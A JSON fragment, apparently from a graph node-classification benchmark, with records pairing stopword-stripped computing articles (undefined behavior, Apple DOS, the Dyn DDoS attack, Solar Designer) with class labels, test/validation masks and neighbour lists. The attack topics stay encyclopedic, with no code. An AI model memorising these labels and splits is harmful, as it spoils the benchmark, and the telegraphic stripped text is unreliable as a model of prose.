      890,
      8573,
      1406,
      11135,
      2432,
      7554,
      8066,
      900,
      6532,
      5514,
      8075,
      4493,
      7565,
      6545,
      11155,
      11667,
      5013,
      2966,
      9621,
      8602,
      11675,
      11676,
      414,
      2974,
      7070,
      11678,
      1444,
      1445,
      9637,
      935,
      10149,
      4521,
      10151,
      4011,
      4012,
      1454,
      6062,
      9646,
      9137,
      8114,
      7603,
      11184,
      8631,
      1464,
      1978,
      9660,
      9665,
      8643,
      1990,
      457,
      5067,
      8147,
      7126,
      2015,
      8671,
      2529,
      6625,
      8676,
      1509,
      2021,
      9189,
      1513,
      492,
      3055,
      7663,
      5105,
      5106,
      2036,
      11256,
      8186,
      2555,
      2044,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 8773,
    "label": 9,
    "text": "Undefined_behavior:undefined behavior computer programming undefined behavior ub result executing computer code whose behavior prescribed language specification code adheres current state program happens translator source code makes certain assumptions assumptions satisfied execution behavior programming languages—most famously c c++—is undefined cases standards languages semantics certain operations described undefined cases typically represent unambiguous bugs code example indexing array outside bounds implementation allowed assume operations never occur correct standard-conforming program code case c/c++ compiler allowed give compile-time diagnostic cases required implementation considered correct whatever cases analogous don't-care terms digital logic responsibility programmer write code never invokes undefined behavior although compiler implementations allowed issue diagnostics happens assumption make various program transformations valid simplify proof correctness giving flexibility implementation result compiler often make optimizations also allows compile-time checks compilers static program analysis c community undefined behavior may humorously referred nasal demons comp.std.c post explained undefined behavior allowing compiler anything chooses even make demons fly nose circumstances specific restrictions undefined behavior example instruction set specifications cpu might leave behavior forms instruction undefined cpu supports memory protection specification probably include blanket rule stating user-accessible instruction may cause hole operating system security actual cpu would permitted corrupt user registers response instruction would allowed example switch supervisor mode documenting operation undefined behavior allows compilers assume operation never happen conforming program gives compiler information code information lead optimization opportunities example c language value codice_1 negative given signed integer overflow undefined behavior c compiler assume codice_2 always false thus codice_3 statement including call function codice_4 ignored compiler since test expression codice_3 side effects condition never satisfied code therefore semantically equivalent compiler forced assume signed integer overflow wraparound behavior transformation would legal optimizations become hard spot humans code complex optimizations like inlining take place another benefit allowing signed integer overflow undefined makes possible store manipulate variable value processor register larger size variable source code example type variable specified source code narrower native register width int 64-bit machine common scenario compiler safely use signed 64-bit integer variable machine code produces without changing defined behavior code program depended behavior 32-bit integer overflow compiler would insert additional logic compiling 64-bit machine overflow behavior machine instructions depends register width important benefit undefined signed integer overflow enables though require erroneous overflows detected compile-time static program analysis run-time checks clang gcc sanitizers valgrind overflow defined semantics wrap-around compile-time checks would possible c c++ standards several forms undefined behavior throughout offer increased liberty compiler implementations compile-time checks expense undefined run-time behavior present particular iso c standard appendix listing common sources undefined behavior moreover compilers required diagnose code relies undefined behavior hence common programmers even experienced ones rely undefined behavior either mistake simply well-versed rules language span hundreds pages result bugs exposed different compiler different settings used testing fuzzing dynamic undefined behavior checks enabled e.g clang sanitizers help catch undefined behavior diagnosed compiler static analyzers scenarios security critical undefined behavior lead security vulnerabilities software gcc developers changed compiler 2008 omitted certain overflow checks relied undefined behavior cert issued warning newer versions compiler linux weekly news pointed behavior observed pathscale c microsoft visual c++ 2005 several compilers warning later amended warn various compilers major forms undefined behavior c broadly classified spatial memory safety violations temporal memory safety violations integer overflow strict aliasing violations alignment violations unsequenced modifications data races loops neither perform i/o terminate c use automatic variable initialized yields undefined behavior integer division zero signed integer overflow indexing array outside defined bounds see buffer overflow null pointer dereferencing general instance undefined behavior leaves abstract execution machine unknown state causes behavior entire program undefined attempting modify string literal causes undefined behavior ref name= c++03 2.13.4/2 iso/iec 2003 iso/iec 14882:2003 e programming languages c++ §2.13.4 string literals lex.string para 2 /ref integer division zero results undefined behavior ref name= c++03 5.6/4 iso/iec 2003 iso/iec 14882:2003 e programming languages c++ §5.6 multiplicative operators expr.mul para 4 /ref certain pointer operations may result undefined behavior ref name= c++03 5.6/5 iso/iec 2003 iso/iec 14882:2003 e programming languages c++ §5.7 additive operators expr.add para 5 /ref c c++ comparison pointers objects strictly defined pointers point members object elements array. ref name= c++03 5.9/2 iso/iec 2003 iso/iec 14882:2003 e programming languages c++ §5.9 relational operators expr.rel para 2 /ref example reaching end value-returning function main without return statement results undefined behavior value function call used caller ref name= c99 6.9.1/12 iso/iec 2007 iso/iec 9899:2007 e programming languages c §6.9 external definitions para 1 /ref modifying object two sequence points produces undefined behavior considerable changes causes undefined behavior relation sequence points c++11 following example however cause undefined behavior c++ c. modifying object two sequence points reading value object purpose determining value stored also undefined behavior. ref name= c99 6.5/2 iso/iec 1999 iso/iec 9899:1999 e programming languages c §6.5 expressions para 2 /ref c/c++ bitwise shifting value number bits either negative number greater equal total number bits value results undefined behavior safest way regardless compiler vendor always keep number bits shift right operand « » bitwise operators within range codice_6",
    "neighbors": [
      6278,
      10510,
      655,
      9871,
      3350,
      5911,
      11674,
      3871,
      1952,
      2975,
      1954,
      7462,
      6184,
      7337,
      815,
      7983,
      7734,
      9911,
      7609,
      1474,
      8262,
      2253,
      7889,
      2262,
      7421,
      10333,
      8545,
      11490,
      8551,
      1776,
      5744,
      4980,
      7292,
      2045,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8774,
    "label": 2,
    "text": "Apple_DOS:apple dos apple dos family disk operating systems apple ii series microcomputers late 1978 early 1983 superseded prodos 1983 apple dos three major releases dos 3.1 dos 3.2 dos 3.3 one three releases followed second minor bug-fix release case apple dos 3.2 minor release receive version number apple dos 3.2.1 best-known most-used version apple dos 3.3 1980 1983 releases prior release apple dos 3.1 apple users rely audio cassette tapes data storage retrieval apple computer introduced apple ii april 1977 new computer disk drive disk operating system dos although apple co-founder steve wozniak designed disk ii controller late year believed could written dos co-founder steve jobs decided outsource task company considered using digital research cp/m wozniak sought operating system easier use 10 april 1978 apple signed 13,000 contract shepardson microsystems write dos deliver within 35 days apple provided detailed specifications early apple employee randy wigginton worked closely shepardson paul laughton latter wrote operating system punched cards minicomputer apple dos 1 2 versions 0.1 2.8 serially enumerated revisions development might well called builds 1 28 apple dos 3.0 renamed issue version 2.8 never publicly released due bugs apple published official documentation release 3.2 apple dos 3.1 publicly released june 1978 slightly one year apple ii introduced becoming first disk-based operating system apple computer bug-fix release came later addressing problem means utility used create apple dos master bootable disks built-in command created disks could booted machines least amount memory one created includes self-relocating version dos boots apples memory configuration apple dos 3.2 released 1979 reflect changes computer booting methods built successor apple ii apple ii plus new firmware included auto-start feature automatically found disk controller booted system powered up—earning name autostart rom apple dos 3.3 released 1980 improves various functions release 3.2 also allowing large gains available floppy disk storage newer p5a/p6a proms disk controller enabled reading writing data higher density instead 13 sectors 3.25 kib 16 sectors 4 kib data stored per disk track increasing capacity 113.75 kb 140 kb per disk side 16 kb used filesystem overhead copy dos dos 3.3-formatted disk leaving 124 kb user programs data dos 3.3 however backward compatible read write dos 3.2 disks address problem apple computer released utility called muffin migrate apple dos 3.2 files programs version 3.3 disks apple never offered utility copy way migrate apple dos 3.3 files back version 3.2 disks someone wrote niffum utility also commercial utilities copy ii plus copy files either format eventually prodos well release 3.3 also improves ability switch integer basic applesoft basic computer language card ram expansion firmware card apple dos 3.1 disks use 13 sectors data per track sector 256 b uses 35 tracks per disk side access one side floppy disk unless user flipped disk gives user total storage capacity 113.75 kb per side 10 kb used store dos disk directory leaving 100 kb user programs first layer operating system called rwts stands read/write track sector layer consists subroutines track seeking sector reading writing disk formatting api called file manager built top implements functions open close read write delete lock i.e write-protect unlock i.e write-enable rename files verify file structural integrity also catalog function listing files diskette init function formats disk use dos storing copy dos first three tracks storing startup program usually called hello auto-started disk booted top file manager api main dos routines implemented hook machine basic interpreter intercept disk commands provides bload bsave brun storing loading running binary executables load run save provided basic programs exec provided running text-based batch files consisting basic dos commands finally four types files exist identified letters catalog listing four additional file types r additional b none fully supported dos recognizes types catalog listings direct ways manipulate types files r type found use relocatable binary executable files programs support type data files call vector table region 03d0–03ff allows programs find dos wherever loaded system memory example dos hooked basic cli stops functioning reinitialized calling location 03d0 976 hence traditional 3d0g 3d0 go command return basic system monitor process loading apple dos involves series tiny programs carries loading process forward steps passing control next program chain original apple ii included basic interpreter rom known originally apple basic later integer basic variables language handle integer numbers ranging −32,768 +32,767 16-bit binary values floating point numbers supported apple commissioned microsoft develop applesoft basic capable handling floating-point numbers applesoft basic run integer basic programs causing users resist upgrading dos 3.3 released applesoft basic standard rom apple ii plus apple designed support switching back forth two basic interpreters integer basic loaded ram language card apple iis present typing fp int basic user switch either version 1980 apple dos entered state stagnation apple concentrated efforts ill-fated apple iii computer sos operating system two versions apple dos still called dos 3.3 bug fixes better support new apple iie model released early mid-1983 without third-party patches apple dos read floppy disks running 5.25-inch disk ii drive access media hard disk drives virtual ram drives 3.5-inch floppy disk drives structure apple dos disks particularly free sector map restricted part single sector possible 400 kb available time per drive without major rewrite almost sections code main reason apple abandoned iteration dos 1983 apple dos entirely replaced prodos prodos retains 16-sector low-level format dos 3.3 5.25 inch disks introduces new high-level format suitable devices 32 mb makes suitable hard disks era 3.5-inch floppies apple computers ii plus onward run dos 3.3 prodos plus requiring language card memory expansion use prodos e later models built-in language card hardware run prodos straight prodos includes software copy files apple dos disks however many people need improvements prodos like much higher memory footprint continued using apple dos one clones long 1983 apple convention storing bootable os every single floppy disk means commercial software used matter os user owns program called dos.master enables users multiple virtual dos 3.3 partitions larger prodos volume allows use many floppy-based dos programs hard disk shortly prodos came apple withdrew permission third parties redistribute dos 3.3 granted one company syndicomm exclusive license resell dos 3.3 commercial games usually use apple dos instead custom disk routines copy protection purposes well performance dos rwts routine read write track two revolutions proper interleaving sector spinning disk passes read/write head rwts routine decoding just-read sector encoding next one written missed sector next one needed dos needs wait nearly entire revolution disk sector come around called blowing rev well-understood performance bottleneck disk systems avoid sectors dos disk arranged interleaved order later prodos arranged sectors order reading decoding sector 0 sector 8 passes sector 1 next sector likely needed available without waiting reading sector 7 two unneeded sectors f 0 pass sector 8 available reading sector 15 drive always wait extra revolution sector 0 track however sector 0 actually needed cases next-higher track track arranged relative last one allow needed time decode just-read sector move head sector 0 comes around average full track read two revolutions disk unfortunately early dos file manager subverted efficiency copying bytes read written file one time disk buffer main memory requiring time resulting dos constantly blowing revs reading writing files programs became available early format disks modified sector interleaves disks give dos time sectors copy data ameliorating problem later programmers outside apple rewrote file manager routines avoid making extra copy sectors file rwts instructed read write sectors directly main memory rather disk buffer whenever full sector transferred early patch provide functionality published call-a.p.p.l.e. speedups load command three five times typical functionality soon appeared commercial products pronto-dos diversi-dos hyper-dos david-dos along additional features never used official apple dos release similar functionality however employed apple successor operating system prodos apple iigs-specific operating system gs/os would eventually employ even efficient scatter read technique would read sector happened passing read head needed file read 2013 35 years apple ii debuted original apple dos source code released computer history museum website donated original author paul laughton",
    "neighbors": [
      2179,
      9732,
      2181,
      10755,
      6023,
      6539,
      7307,
      4114,
      6675,
      9762,
      11171,
      11430,
      3241,
      6186,
      5293,
      7983,
      3248,
      8754,
      823,
      7991,
      4409,
      9784,
      2363,
      7483,
      2365,
      2366,
      7739,
      576,
      8510,
      8767,
      11257,
      10052,
      11513,
      8262,
      712,
      2383,
      3286,
      1623,
      2395,
      9308,
      477,
      7133,
      3167,
      3681,
      5093,
      5733,
      10855,
      6377,
      2282,
      3948,
      5359,
      5363,
      5619,
      2933,
      8441,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 8775,
    "label": 9,
    "text": "Free-form_language:free-form language computer programming free-form language programming language positioning characters page program text insignificant program text need placed specific columns old punched card systems frequently ends lines insignificant whitespace characters used delimit tokens significance free-form languages descend algol including c pascal perl lisp languages free-form although descend algol rexx mostly free-form though cases whitespace characters concatenation operators sql though full programming language also free-form free-form languages also structured programming languages sometimes thought go along free-form syntax earlier imperative programming languages fortran 77 used particular columns line numbers many structured languages use need structured languages exist free-form abc curry haskell python others many use variant off-side rule indentation rather keywords braces used group blocks code",
    "neighbors": [
      512,
      8582,
      5651,
      3876,
      10413,
      2936,
      443,
      6718,
      963,
      8644,
      8262,
      2505,
      8524,
      6502,
      8554,
      8171,
      9454,
      10097,
      3960,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8776,
    "label": 3,
    "text": "Palm_OS_Emulator:palm os emulator descended copilot palm os emulator used writing testing debugging palm os applications palm os emulator emulates motorola 68000-class devices intimate knowledge palm os inner working allowing close monitoring correct application operation unlike xcopilot another descendant copilot palm os emulator boot uclinux using skin files palm os emulator could closely mimic appearance many models palm handheld versions palm os emulator require file containing rom image boot rom image files obtained palmsource part access co. ltd downloaded real palm device palm os emulator supported palm models produced palm handera handspring symbol palm os handhelds produced sony clie line supported separate sony-specific fork palm os emulator copilot palm os emulator released gpl v2 versions developed palm inc. windows macintosh unix platforms sony fork released windows palm os emulator supports palm os 4.x earlier support palm os 5.x later versions based arm processor palmsource provides simulators palm os 5.x palm os recompiled run natively windows linux mac windows versions emulator included cd-rom included palm programming developer guide published o'reilly 1999",
    "neighbors": [
      5264,
      7269,
      11326
    ],
    "mask": "Test"
  },
  {
    "node_id": 8777,
    "label": 7,
    "text": "Semantic_P2P_networks:semantic p2p networks semantic p2p networks new type p2p network combines advantages unstructured p2p networks structural p2p networks avoids disadvantages semantic p2p networks nodes classified dns-like domain names semantic meanings alice brittney.popular.music semantic p2p networks contains prerequisite virtual tree topology net-like topology formed cached nodes semantic p2p networks keep semantic meanings nodes contents nodes within semantic p2p networks communicate various languages semantic p2p network execute complicated queries sql-like language similarities semantic p2p systems software agents p2p means entities exchange information directly without mediator semantic concept add meaning information peer usually autonomous systems well agents agents follow goal though goal attainment requires knowledge base rules strategies major difference software agents semantic peers latter lacks kind intelligence",
    "neighbors": [
      8640,
      10452,
      10413,
      2887
    ],
    "mask": "Test"
  },
  {
    "node_id": 8778,
    "label": 2,
    "text": "Mg_(editor):mg editor mg originally called micrognuemacs later changed request richard stallman public-domain text editor runs unix-like operating systems based microemacs intended closely resemble gnu emacs still maintaining small memory footprint fast speed expanded version original included part openbsd maintained snapshots openbsd version available native package management trees many systems including macports freebsd ports pkgsrc debian",
    "neighbors": [
      9223,
      10631,
      2825,
      3465,
      1932,
      9487,
      274,
      5397,
      7702,
      10105,
      9245,
      8993,
      6702,
      9520,
      823,
      5819,
      5694,
      2245,
      9671,
      1993,
      3404,
      11086,
      5970,
      3675,
      5084,
      7139,
      1637,
      4071,
      5230,
      2166,
      1785,
      8954
    ],
    "mask": "None"
  },
  {
    "node_id": 8779,
    "label": 4,
    "text": "2016_Dyn_cyberattack:2016 dyn cyberattack 2016 dyn cyberattack series distributed denial-of-service attacks ddos attacks october 21 2016 targeting systems operated domain name system dns provider dyn attack caused major internet platforms services unavailable large swathes users europe north america groups anonymous new world hackers claimed responsibility attack scant evidence provided dns provider dyn provides end-users service mapping internet domain name—when instance entered web browser—to corresponding ip address distributed denial-of-service ddos attack accomplished large number dns lookup requests tens millions ip addresses activities believed executed botnet consisting large number internet-connected devices—such printers ip cameras residential gateways baby monitors—that infected mirai malware according dyn distributed denial-of-service ddos attack began 7:00 a.m. edt resolved 9:20 a.m. second attack reported 11:52 a.m. internet users began reporting difficulties accessing websites third attack began afternoon 4:00 p.m. 6:11 p.m. dyn reported resolved issue dyn chief strategy officer spokesperson kyle york led communication response customers partners market services affected attack included us department homeland security started investigation attacks according white house source group hackers claimed responsibility immediate aftermath attack dyn chief strategist said interview assaults company servers complex unlike everyday ddos attacks barbara simons member advisory board united states election assistance commission said attacks could affect electronic voting overseas military civilians dyn disclosed according business risk intelligence firm flashpoint akamai technologies attack botnet coordinated large number internet things-enabled iot devices including cameras residential gateways baby monitors infected mirai malware attribution attack mirai botnet previously reported backconnect inc. another security firm dyn stated receiving malicious requests tens millions ip addresses mirai designed brute-force security iot device allowing controlled remotely cybersecurity investigator brian krebs noted source code mirai released onto internet open-source manner weeks prior make investigation perpetrator difficult 25 october 2016 us president obama stated investigators still idea carried cyberattack 13 december 2017 justice department announced three men paras jha 21 josiah white 20 dalton norman 21 entered guilty pleas cybercrime cases relating mirai clickfraud botnets correspondence website politico hacktivist groups spainsquad anonymous new world hackers claimed responsibility attack retaliation ecuador rescinding internet access wikileaks founder julian assange embassy london granted asylum claim yet confirmed wikileaks alluded attack twitter tweeting mr. assange still alive wikileaks still publishing ask supporters stop taking us internet proved point new world hackers claimed responsibility past similar attacks targeting sites like bbc espn.com october 26 flashpoint stated attack likely done script kiddies november 17 2016 forbes article reported attack likely carried angry gamer",
    "neighbors": [
      0,
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      9305,
      4703,
      8288,
      8292,
      8805,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      4883,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      8495,
      1337,
      2887,
      6484,
      857,
      1882,
      7515,
      2409,
      3956,
      9082,
      10110,
      7556,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      11221,
      4054,
      7639,
      8664,
      1504,
      9186,
      8170,
      2542,
      507
    ],
    "mask": "None"
  },
  {
    "node_id": 8780,
    "label": 1,
    "text": "Clive_Finkelstein:clive finkelstein clive finkelstein born ca 1939 australian computer scientist known father information technology engineering 1961 finkelstein received bachelor science university new south wales sydney graduation finkelstein started working field database processing ibm australia usa back australia 1976 founded consultancy firm infocom australia 1972 finkelstein elected fellow australian computer society finkelstein distinguished member international advisory board dama international data administration management association john zachman 2008 awarded position pearcey hall fame acs australia 1976 1980 finkelstein developed concept information technology engineering based original work carried bridge strategic business planning information systems wrote first publication information technology engineering series six in-depth articles name published us computerworld may june 1981 also co-authored james martin influential savant institute report titled information engineering published nov 1981 also wrote monthly column enterprise dm review magazine",
    "neighbors": [
      4412
    ],
    "mask": "Test"
  },
  {
    "node_id": 8781,
    "label": 1,
    "text": "ADOdb:adodb adodb database abstraction library php originally based concept microsoft activex data objects allows developers write applications consistent way regardless underlying database system storing information advantage database system changed without re-writing every call application adodb supports following databases addition database abstraction layer adodb includes following features",
    "neighbors": [
      6465,
      6850,
      7523,
      8644,
      2183,
      9320,
      9481,
      5546,
      4106,
      9389,
      270,
      7022,
      8539,
      11030,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 8782,
    "label": 3,
    "text": "Code_Breaker:code breaker code breaker cheat device developed pelican accessories currently available playstation playstation 2 dreamcast game boy advance nintendo ds along competing product action replay one currently supported video game cheat devices originally developed fire international group distributed pelican accessories ntsc/uc north american counterpart pal european xploder cheat device codebreaker first appeared dreamcast relatively late console lifecycle soon dreamcast version released development began playstation 2 version version six hit market fire international abruptly broke partnership pelican develop newly mad catz-acquired gameshark also time game boy advance code breaker discontinued pelican accessories put together internal development team proceeded future versions codebreaker original site www.codebreaker.com codetwink bought new site day1 feature allows get codes online import codebreaker usb flash drive codes removed codetwink brought back though previous versions playstation 2 code breaker plagued limited functionality later versions lauded features simple uncluttered menu typing systems version 9 added support usb keyboards unlike cheat devices store cheat codes proprietary storage devices playstation 2 code breaker stores codes memory cards thus cutting manufacturing costs saves also copied usb flash drives device official web site codetwink run codemasterx also coded entire cheat engine cheat code types product provides codes posted former game shark code creators club codes downloaded official web site using device day1 feature later versions include support playstation 2 broadband adapter internet chat using code breaker device one access feature named day1 import/export saves cases one avoid typing number number using cheats import however pelican accessories longer supports since latest version codebreaker codebreaker 10.1 www.codebreaker.com set codebreaker site device longer connect internet get codes use codebreaker chat site change code breaker discontinued may 2012 www.codetwink.com uses vbulletin type site format still codebreaker day1 files available download people register account june 2013 day1 files unavailable codetwink.com server moved hard drive damaged april 2017 mirror old codetwink site hosted wes castro developer cheat device project codemasterx also returned hosting maintaining modern codetwink site also sells game genie game save editor playstation 3 consoles",
    "neighbors": [
      10241,
      10316,
      9477
    ],
    "mask": "Test"
  },
  {
    "node_id": 8783,
    "label": 2,
    "text": "IPod_Touch_(5th_generation):ipod touch 5th generation fifth-generation ipod touch stylized marketed ipod touch colloquially known ipod touch 5g ipod touch 5 unveiled apple media event alongside iphone 5 september 12 2012 released october 11 2012 all-purpose pocket computer designed marketed apple inc. touchscreen-based user interface succeeded 4th-generation ipod touch compatible ios 9.3.5 released august 25 2016 like iphone 5 fifth-generation ipod touch slimmer lighter model introduces higher-resolution 4-inch screen series widescreen aspect ratio improvements include support recording 1080p video panoramic still photos via rear camera led flash apple a5 chip chip used ipad mini 1st generation ipad 2 iphone 4s support apple siri additionally unlike predecessors fifth-generation ipod touch initially featured slate silver pink yellow blue product red back colors however release iphone 5s slate color changed space gray colors remained unchanged device initially sold 32 gb 64 gb models first 16 gb model introduced may 30 2013 available one color lacks rear isight camera ipod touch loop included 32 gb models june 26 2014 replaced new 16 gb model longer omits rear camera full range color options pricing ipod touch also changed 16 gb model 199 instead 229 32 gb model 249 instead 299 64 gb model 299 instead 399 ipod touch 5th generation officially discontinued apple july 15 2015 release successor ipod touch 6th generation however apple still continues sell refurbished models fifth generation ipod touch features ios apple mobile operating system user interface ios based concept direct manipulation using multi-touch gestures interface control elements consist sliders switches buttons interaction os includes gestures swipe tap pinch reverse pinch specific definitions within context ios operating system multi-touch interface internal accelerometers used applications respond shaking device one common result undo command rotating vertically one common result switching portrait landscape mode initially shipped ios 6 released september 19 2012 play music movies television shows ebooks audiobooks podcasts sort media library songs artists albums videos playlists genres composers podcasts audiobooks compilations users rotate device horizontally landscape mode access cover flow feature shows different album covers scroll-through photo library scrolling achieved swiping finger across screen alternatively headset controls used pause play skip repeat tracks however earpods comes ipod include remote mic voice control feature also used identify track play songs playlist specific artist create genius playlist like iphone 4s later models fifth generation ipod touch first ipod touch line-up include siri allows user operate device spoken commands software improved ios 6 include ability make restaurant reservations launch apps dictate facebook twitter updates retrieve movie reviews detailed sports statistics typing aided voice assistant converts speech text also supports imessage specialised instant messaging program service allows unlimited texting apple devices running ios 5 later newer applications features came ios 6 included apple maps passbook screen mirroring apple maps replaced former map application powered google maps lacks many features present competing maps apps also known give wrong directions users still fixed ios 7 updates new apple maps app uses apple new vector-based engine eliminates lag making smoother zooming new maps turn-by-turn navigation spoken directions 3d views major cities real-time traffic new passbook app able retrieve documents boarding passes admission tickets coupons loyalty cards ios device passbook scanned reader process mobile payment locations compatible hardware airplay made available allows screen mirroring apple tv supported external device allows screen ipod touch mirrored first generation ipod touch support ios 7 released september 18 2013 ios devices generation ipod touch ipod touch line-up run ios 7 june 2 2014 announced ipod touch 5th generation would receive ios 8 fall released september 17 2014 confirmed june 8 2015 apple wwdc ipod touch 5th generation would support ios 9 makes first ipod touch support 4 major versions ios ios 6 ios 7 ios 8 ios 9. ios 9 said apple feature performance improvements may help aging device function smoothly a5-based devices also support ios 9 including ipad 2 6 major ios versions iphone 4s 5 major ios versions ipad mini 4 major ios versions ios 9.3.5 last update supports ipod touch 5th generation receive ios 10 along iphone 4s ipad 2 3 ipad mini 1st generation due hardware limitations fifth generation ipod touch features apple a5 chip similar one iphone 4s ipad 2 ipad mini chip comprises 1 ghz dual core arm cortex-a9 processor powervr sgx543mp2 2-core gpu making faster fourth generation ipod touch uses apple a4 chip storage capacities available 32 64 gb 16 gb announced later date replace previous generation retina display ipod similar one iphone 5 measuring 1,136 640 pixels aspect ratio almost exactly 16:9 measuring 4 inches diagonally display size 6.7 square inches pixel density 326 ppi remains fourth generation screen icons arranged matrix 6 rows 4 icons larger screen previous generation model fifth generation ipod touch allows 6th row icons added 5 rows present fourth generation ipod touch however fifth generation ipod touch include ambient light sensor included previous generation new isight camera 5 megapixels capable 1080p video recording illuminated sensor led flash front-facing camera also upgraded 1.2 megapixels capable 720p video compared vga 0.3 megapixels front camera fourth generation fifth-generation ipod touch finish features aluminum unibody made kind anodized aluminium used macbook line new isight camera led flash ipod touch includes new feature known ipod touch loop bottom left corner back ipod touch button pressed allow wrist strap attach ipod touch changes ipod touch include addition colors available five space grey replacing slate color variant september 2013 silver pink yellow blue product red space grey slate version comes black front rest color variants ipod come white front fifth-generation ipod touch initially released 32 gb 64 gb models 16 gb version include isight camera led flash loop released may 30 2013 model replaced 16 gb model original design june 26 2014 fifth generation ipod touch well iphone 5 ipod nano 7th generation ipad 4th generation ipad mini feature new dock connector named lightning replacing 30-pin apple dock connector first introduced apple 2003 third generation ipod apple lightning connector eight pins signaling digital new connector also inserted either way unlike 30-pin connector inserted one way adapters released apple convert apple lightning connector older 30-pin apple dock connector usb although accessories work adapter signals available particular video output ipod feature bmw automobiles earphones known apple earpods also included fifth generation ipod touch devices announced apple media event september 12 2012 superseded earphones included previous generation iphones ipods according technology commentators redesign earphones aimed improve sound quality allowing air travel freely apple states redesign earphones allows rival high-end headphones cost hundreds dollars reviews gizmodo techradar reported although redesigned earphones sounded better predecessor reviewers felt quality sound produced still underwhelming stated earpods pale comparison earphones similar price accessories sold ipod touch include lanyard ipod touch loop available 16 gb model andrew williams trustedreviews noted 5th generation ipod touch common features iphone 5 praising design respectable connectivity graham barlow techradar commended improved screen color variants greater quality earphones ipod light weight criticizing reset lightning port scott stein cnet praised enhanced camera quality design remarked ipod touch still weaker outclassed compared ios devices",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      576,
      7745,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      3790,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      3928,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6537,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      8109,
      2492,
      446,
      7614,
      5058,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8784,
    "label": 4,
    "text": "Clavister:clavister br clavister swedish company specialized network security software listed nasdaq first north according report 451 research edward snowden nsa leaks consequent loss trust us-based products helped international expansion clavister clavister global presence customers japanese ntt-bp german marbach group clavister partnerships example japanese canon-its area virtualized network security nokia networks artesyn comparison firewalls",
    "neighbors": [
      9488,
      3885,
      3495
    ],
    "mask": "Test"
  },
  {
    "node_id": 8785,
    "label": 4,
    "text": "Backup_sync_share:backup sync share backup sync share bss emerging category products stems combination traditional data backup programs data synchronization mirroring applications data sharing applications many considerable expanding social media element",
    "neighbors": [
      7409
    ],
    "mask": "None"
  },
  {
    "node_id": 8786,
    "label": 3,
    "text": "Compaq_Portable_II:compaq portable ii compaq portable ii third product compaq portable series brought compaq computer corporation released 1986 price us 3499 portable ii much improved upon predecessors included 8 mhz processor lighter smaller compaq portable four models compaq portable ii basic model 1 shipped one 5.25 floppy drive 256kb ram model 2 added second 5.25 floppy drive sold 3599 model 3 shipped 10mb hard disk addition one 5.25 floppy drive 640kb ram 4799 launch model 4 would upgrade model 3 20mb hard drive sold 4999 also may 4.1 mb hard drive included one point compaq portable ii significantly lighter predecessors model 1 weighed 23.6 pounds compared 30.5 pounds compaq portable 286 weighed compaq shipped system small demo disk ms-dos 3.1 purchased separately least two reported cases improperly serviced computers exploding non-rechargeable lithium battery motherboard connected power supply recorded injuries compaq portable ii succeeded compaq portable iii 1987 compaq portable ii room additional market upgrades compaq manufactured four memory expansion boards 512kb 2048kb isa memory cards 512kb 1536kb memory boards attached back motherboard 640kb installed motherboard isa card expansion board computer could upgraded maximum 4.2mb ram motherboard also space optional 80287 math coprocessor two revisions motherboard functionally identical although earlier version larger motherboard four isa slots expansion cards two 8-bit two 16-bit however first 16-bit slot already occupied cga graphics card one 8-bit slots used ata drive controller board leaving two available add cards keyboard hardwired uses standard ps/2 signaling din ps/2 socket retrofitted allow use common ps/2 keyboards usb ones",
    "neighbors": [
      11008,
      3943,
      780,
      7983,
      1776,
      11100
    ],
    "mask": "Test"
  },
  {
    "node_id": 8787,
    "label": 4,
    "text": "Solar_Designer:solar designer alexander peslyak александр песляк born 1977 better known solar designer security specialist russia best known publications exploitation techniques including return-to-libc attack first generic heap-based buffer overflow exploitation technique well computer security protection techniques privilege separation daemon processes peslyak author widely popular password cracking tool john ripper code also used various third-party operating systems openbsd debian peslyak founder leader openwall project since 1999 founder openwall inc. cto since 2003 served advisory board member open source computer emergency response team ocert 2008 ocert conclusion august 2017 also co-founded oss-security spoken many international conferences including fosdem cansecwest wrote foreword michał zalewski 2005 book silence wire alexander received 2009 lifetime achievement award annual pwnie award black hat security conference 2015 qualys acknowledged help disclosure gnu c library codice_1 function buffer overflow cve-2015-0235",
    "neighbors": [
      1026,
      6916,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      2709,
      3478,
      6808,
      8344,
      7450,
      2716,
      6302,
      7584,
      161,
      802,
      5410,
      6691,
      6947,
      8354,
      8867,
      9854,
      5931,
      4140,
      8364,
      9646,
      1717,
      823,
      2109,
      11069,
      10687,
      1474,
      10822,
      8263,
      843,
      589,
      1103,
      6352,
      4177,
      11602,
      4437,
      6489,
      3802,
      4956,
      4445,
